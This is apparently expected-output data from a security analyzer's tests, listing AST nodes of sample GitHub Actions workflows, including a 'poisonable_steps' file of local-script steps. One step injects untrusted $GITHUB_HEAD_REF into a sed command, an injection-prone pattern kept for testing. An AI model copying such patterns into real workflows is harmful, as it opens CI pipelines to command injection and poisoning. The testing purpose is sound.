.github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:78:15:78:21 | block12 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:78:15:78:21 | block12 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:78:15:78:21 | block12 | .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:85:15:85:21 | block13 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:85:15:85:21 | block13 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:85:15:85:21 | block13 | .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/shell.yml:1:5:1:8 | push | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:1:5:1:8 | push | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:1:5:1:8 | push | .github/workflows/shell.yml:1:5:1:8 | push | +| .github/workflows/shell.yml:1:5:1:8 | push | .github/workflows/shell.yml:1:5:1:8 | push | +| .github/workflows/shell.yml:1:5:1:8 | push | .github/workflows/shell.yml:1:5:1:8 | push | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:5:14:5:26 | ubuntu-latest | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:5:14:5:26 | ubuntu-latest | .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:7:16:7:19 | pwsh | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:7:16:7:19 | pwsh | .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:7:16:7:19 | pwsh | .github/workflows/shell.yml:7:9:9:2 | Run Step | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | .github/workflows/shell.yml:7:9:9:2 | Run Step | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:10:14:10:26 | ubuntu-latest | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:10:14:10:26 | ubuntu-latest | .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:12:14:12:23 | echo "foo" | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:12:14:12:23 | echo "foo" | .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:12:14:12:23 | echo "foo" | .github/workflows/shell.yml:12:9:14:2 | Run Step | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:15:14:15:27 | windows-latest | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:15:14:15:27 | windows-latest | .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:17:16:17:19 | bash | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:17:16:17:19 | bash | .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:17:16:17:19 | bash | .github/workflows/shell.yml:17:9:19:2 | Run Step | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | .github/workflows/shell.yml:17:9:19:2 | Run Step | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:20:14:20:27 | windows-latest | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:20:14:20:27 | windows-latest | .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | .github/workflows/shell.yml:22:9:22:32 | Run Step | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:14:5:26 